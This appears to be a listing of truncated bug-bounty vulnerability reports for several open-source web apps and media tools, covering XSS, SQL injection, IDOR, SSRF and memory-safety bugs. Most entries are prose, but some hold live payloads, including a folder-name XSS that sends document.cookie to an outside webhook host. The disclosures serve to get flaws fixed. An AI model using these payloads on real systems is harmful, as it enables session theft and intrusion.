Desktop APP RCE via saveDraft IPC

🔒️ Requirements The user must load a malicious project. 📝 Description In version 20.3.3 commit 5383c20e947fd772668316e407edc5d5db4850db, the shell=true option is added to a spawn execution. This is really dangerous has it allows a malicious user to execute commands even from attributes. Example: j...

XSS Filter Bypass in Folder Name leading to Information Disclosure

Description Proof of Concept First, login to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...

Local file read through %load_json

Description When ALLOWPLANTUMLINCLUDE is set to false the default settings in the online server, !include processing is turned off, preventing local files from being read. However, other features like %loadjson can still access local files. Since many people will run plantuml-server in its defaul...

URL Restriction Bypass

Description In attempting to fix a previous issue, the PATTERNUSERINFO regular expression was changed. This change introduced another way to bypass the URL allowlist by introducing non-alphanumeric characters into the user information part of the URL. Proof of Concept Run PlantUML with...

IDOR in message deletion

Description user can delete others's message. we know the report https://huntr.dev/bounties/24ae402f-220f-41c6-962e-47c26938986e/ , but we find that we do not fix one case. Proof of Concept 1 user1 send admin a greeting card1 2 user2 send admin a greeting card2 3 user1 delete his message related ...

Users can order Add-Ons Separately

Description I find a requirement that addons must be purchased in conjunction with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the...

Directory listing in multiple endpoints

Description Teampass has directory listing by default for various endpoints that eventually discloses application-specific and user data and files. Proof of Concept Visit the following endpoint without logging in to the application. Sensitive - https://127.0.0.1/includes configs -...

Stored XSS via Default session expiration time

Description The Default session expiration time feature when submitted HTML/JS tags executes the code in the login page. Proof of Concept Login to Teampass and go to Settings = Options. http://127.0.0.1/index.php?page=options In theDefault session expiration time input field insert an XSS payload...

Downloadable product type lacks order status check

Description There is a vulnerability in fossbilling where upgrading non-active orders is prevented, but it is possible to still do so through the upgrade API...

Privilege Escalation Vulnerability in Product Upgrade Module

Description Our product upgrade module contained a privilege escalation vulnerability that would allow an unauthorized user to upgrade to a product they were not authorized to. After an administrator had Product 1 can upgrde as Product2 , but not Product3, a user could use Burpsuite to intercept...

Security vulnerability in product bundling feature

Description Our e-commerce platform offers a bundled sales promotion feature, allowing an administrator to bind the sale of a product to an addon. However, we have identified a security vulnerability that exists in this feature. After an administrator cancels a bundle offer, users can still make...

Serious Security Vulnerability Discovered in Promotion

Description I am writing to report a serious security vulnerability that we have uncovered. Specifically, we have found that promotions applied to certain client groups are still being honored even after the promotions are no longer applicable to those groups. This means that attackers can...

we still can order the product even it is disabled

Description I am writing to report a potential security vulnerability that was uncovered in your platform. Specifically, we discovered that your product purchase functionality can still be accessed via API even after the product has been disabled and is no longer available for sale. Proof of...

Stored XSS in Survey Groups Function

Description By Injecting the payloads to the fields Title, Description, users who visited "Survey list" screen maybe compromises Proof of Concept Step 1: Login as Administrator, go to the "Survey list" screen function, click "create survey group" button. Step 2: Inject the payload to the fields...

Stored XSS vulnerability

Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept 1 Step1: The user has the right to access and perform the creation of surveys, with the payload...

Unauthenticated Blind SSRF

Description The Oxeye research team found Owncast vulnerable to an Unauthenticated Blind SSRF vulnerability. This vulnerability may allow an unauthenticated attacker to force the Owncast server to send HTTP requests to arbitrary locations using the GET HTTP method. This vulnerability also allows...

Open Redirect on follow/unfollow user's profile action

Description The idea is similar to CVE-2022-1058 https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d/ . Browsers interpreted \example.com - https://example.com and lead to open redirect Proof of Concept The vulnerable API is lie in follow/unfollow action on user's profile. In order to...

Formula Injection vulnerability in CSV export feature

Description The admidio application is vulnerable to Formula Injection/CSV injection via the Firstname, Lastname input fields. These vulnerabilities allow unauthenticated attackers to execute arbitrary code via a a crafted excel file. Proof of Concept 1. Create a member with role Associations boa...

Stored XSS via file upload in FireFox

Description Upload html file containing XSS payload. Payload ' On opening and refreshing the page, XSS payload executes in Firefox. Proof of Concept https://drive.google.com/file/d/1Irkg0u-8DcEizRSN3xE87ezEWmp0L4j/view?usp=sharing...

HTML Injection in Folder Name

Description The folder name does not sanitize folder name and due to missing output encoding, HTML user-input is rendered in the webpage during folder deletion. Proof of Concept 1. Login to Teampass as any user. 2. Go to Folders tab. 3. Create a new folder with HTML tag in the Label. Example: HTM...

IDOR can make attackers add or close others' unavaiable

both user1 and user2 are Providers 1 user1 login and add unavaiable 2 request can be like POST /index.php/backendapi/ajaxsaveunavailable HTTP/1.1...

we can still send the photo as greeting card even the albums is locked

1 admin create a album and upload a photo 2 member-1 login and send the photo as greeting card to member-2 3 member-1 use burpsuite hijack the request, which can be like POST /admprogram/modules/ecards/ecardsend.php HTTP/1.1...

Stored XSS in many configuration fields

Description Paste the XSS payload into the configuration fields. And I think there are many fields to configure that can be vulnerable to Stored XSS vulnerabilities, such as configuration fields in Options, MFA, API, Emails,... hope you check it too. Proof of Concept...

Create multiple user with the same username (Race Condition)

Description Administrator users can create multiple users with the same username which breaks the logic of the web application. Proof of Concept Step 1: At AdministrationUser ManagementManager User Screen, click on "New Local User" button Step 2: Fill in all the required fields, notice that the...

HTML Injection / Possible XSS

Description In pimcore I was able to identify a Unauthenticated HTML Injection / XSS Possible. Conditions: 2 factor authentication must not set before Vulnerable Endpoint: http://localhost/admin/login/2fa-setup Vulnerable Param: error= How it works, So basically any admin, who has not setup 2...

CSRF on /api/graphql query executing the mutations through GET requests

Description Mutations are saveRecord or createProcess queries used in Graphql. SuiteCRM prevents CSRF in this functionality by sending a POST request with a X-Xsrf-Token header. the bug here is that, when we send a GET request, the backend does not expect the X-Xsrf-Token header. Using this, an...

Stored XSS on user's name

Description Paste the payload XSS into the Name or Last name field. XSS vulnerability will trigger. Proof of Concept https://drive.google.com/file/d/1hoZkCxzTQbcIDy28hKJyjyrOD1Pcaaz0/view?usp=sharing...

The web app does not verify weak password at backend

Description Access and login to the demo website: https://cloudexplorer-lite-demo.fit2cloud.com/ At changing password function, the backend does not verify weak passwords so that user can do: 1/ Set new password as same as old password. 2/ Set new password by one character, such as 1. This case c...

missing permission check for API /setting/workspace/member/update

Proof of Concept 1 user1 是workspace1的空间管理员 2 user2 是workspace1的成员 3 user1 更新user2的信息，比如将其更新为空间管理员 4 使用burpsuite拦截请求 POST /setting/workspace/member/update HTTP/1.1 Host: 192.168.213.128:8081 Content-Length: 144 Accept-Language: zh-CN WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7 User-Agent:...

Stored XSS in End page

Description Allows a user who only has the authority to create surveys not the administrator to bypass validation and embed javascript schemes when creating surveys Step to reproduce - Login as administrator 1. Open User management and Create a user with create surveys only permissions. 1. Logout...

OOB read from unchecked return

Environment bash Distributor ID: Debian Description: Debian GNU/Linux bookworm/sid Version I checked against the latest release as of 05/29/23 the current master branch at commit 4f810869b06b5d7b0cb73d166864dfb4b1e900f6 . Description This AddressSanitizer output is indicating a read on an unknown...

DOM Cross Site Scripting and openredirect

Vulnerable Endpoint: https://demo.saleor.io/default-channel/en-US/account/login/?next=javascript:alert1 Description: 1. Hello team, Recently i found that, on saleor React storefront dashboard there is a DOM XSS and open-redirect vulnerability Steps to reproduce XSS: 1. Go to the above mentioned...

Cross-Site Scripting (Stored XSS)

Description With Association's board role, i can add a new web link. But, when i create a link, in Link name input field can insert an onfocus/autofocus attribute because do not processing for double quote. Proof of Concept 1. Login by account with Association's board role 2. Access funtion Web...

Improper Authorization in "Customer automation rules" function

Description The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an actions. Proof of Concept The user does not have permission to delete the rule. Location - GET /admin/customermanagementframework/rules/list - POST...

Integer Overflow in tjexample.c

Description The tjexample.c example program uses tjAlloc function to allocate the output buffer of the JPEG buffer. tjAlloc uses malloc which takes a sizet number of bytes an unsigned integer. However, tjAlloc itself takes the number of bytes as a signed integer:...

Markdown injection into github comment

Description Users can donate for builds by tipping [email protected]. There's a github action that will thank the user in a comment. The name is not sanitized and by using one such as the following, attackers can inject their own markdown into the comment. foo The "" breaks out of the context,...

Reflected XSS Vulnerability at `_detail/?lang` parameter

Description Reflected XSS vulnerability allows attackers to exploit the trust placed by a web application in user-supplied input, such as query parameters or form fields. In this case, the vulnerability was found in the following URL: https://www.dokuwiki.org/detail/?lang=1"alertdocument.domain...

NULL Pointer Dereference in function xml_sax_append_string

Description NULL Pointer Dereference In utils/xmlparser.c:963 Environment No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04 LTS Release: 20.04 Codename: focal Version MP4Box - GPAC version 2.3-DEV-rev293-g56eed04c2-master c 2000-2023 Telecom Paris distributed under LG...

Stored XSS on item name - Bypass of (CVE-2023-2516)

Description first create two user accounts and grant them permission to access a same folder. In one of the accounts, generate a new item within the folder. Paste the payload XSS into this field, then save the item. Once saved, click on the item to activate an XSS alert. This is the bypass of...

OOB Write ops.c

Environment bash Distributor ID: Debian Description: Debian GNU/Linux bookworm/sid Version I checked against the master branch at commit 50809a45ebde327cb6fdcc727d7466e926aed713 . Description This AddressSanitizer output is indicating a write to the 0x7fd0c2103000 address, this is because the...

Stored XSS on FolderName Affecting other users and admin.

Description If two users have same folder permission, malicious users can rename the folder with XSS payload, which will affect the other user, and admin. Payload: "img src=x onerror=alert1 Proof of Concept https://drive.google.com/file/d/1ukzcFocVAnd8WKEEo7-zE4iEMVLKUnXt/view...

SQL injection in some Admin Sort functions

Description SQL injection due to unsanitized concatenating strings into ORDER BY clause, 'sort' parameter Proof of Concept Log in as an admin, go to Admin Translations or Application Logger functions, and perform a sort action Observer the request on Burpsuite and injection point is the 'sort'...

SQL Injection in the "Users" function of Piwigo

Description Authenticated admin can perform an SQL injection attack by abusing the "Users" function. Proof of Concept - Log in as an admin and access the 'Users' function. - Observe the request on Burp suite POST /piwigo/ws.php?format=json&method=pwg.users.getList. - Manipulate the 'order' or...

Partial Local file inclusion

Description An authenticated user can extend the range of the web application's folder context and can dig out to OS level. To reproduce the issue, please authenticate to the web application, and simply open the following URL in the browser:...

Stored XSS Via SVG Upload

Description I've found a Stored XSS via uploading SVG file with the following content: Proof of Concept https://drive.google.com/file/d/16HC08PPqAHZuubz-1IMJYZSETpTQZOzA/view?usp=sharing...

Divide By Zero FPE

Environment bash Distributor ID: Debian Description: Debian GNU/Linux bookworm/sid Release: n/a Codename: bookworm Version I checked against the latest release as of 05/18/23 the current master branch at commit a6ae93532ea5615c876c81a6580badbfa01d4383 . Description This AddressSanitizer output is...

OOB Read segfault

Environment bash Distributor ID: Debian Description: Debian GNU/Linux bookworm/sid Release: n/a Codename: bookworm Version I checked against the latest release as of 05/18/23 the current master branch at commit a6ae93532ea5615c876c81a6580badbfa01d4383 . Description This AddressSanitizer output is...

File Path Traversal Vulnerability

Description in the file adminautoupdate.php php elseif $page == 'extract' if isset$POST'send' && $POST'send' == 'send' $toExtract = isset$POST'archive' ? $POST'archive' : null; $localArchive = Froxlor::getInstallDir . '/updates/' . $toExtract; $log-logActionFroxlorLogger::ADMACTION, LOGNOTICE,...

NULL Pointer Dereference

Description NULL Pointer Dereference In gfisomfragmentaddsampleex isomedia/moviefragments.c:2883 Environment No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04 LTS Release: 20.04 Codename: focal Build sudo CC=gcc CXX=g++ CFLAGS="-fsanitize=address -static-libasan"...

Stack-overflow in function xml_sax_parse at src/utils/xml_parser.c

Description Stack-overflow in MP4Box. Version shell MP4Box - GPAC version 2.3-DEV-rev263-g2afa05f4d-master c 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC:...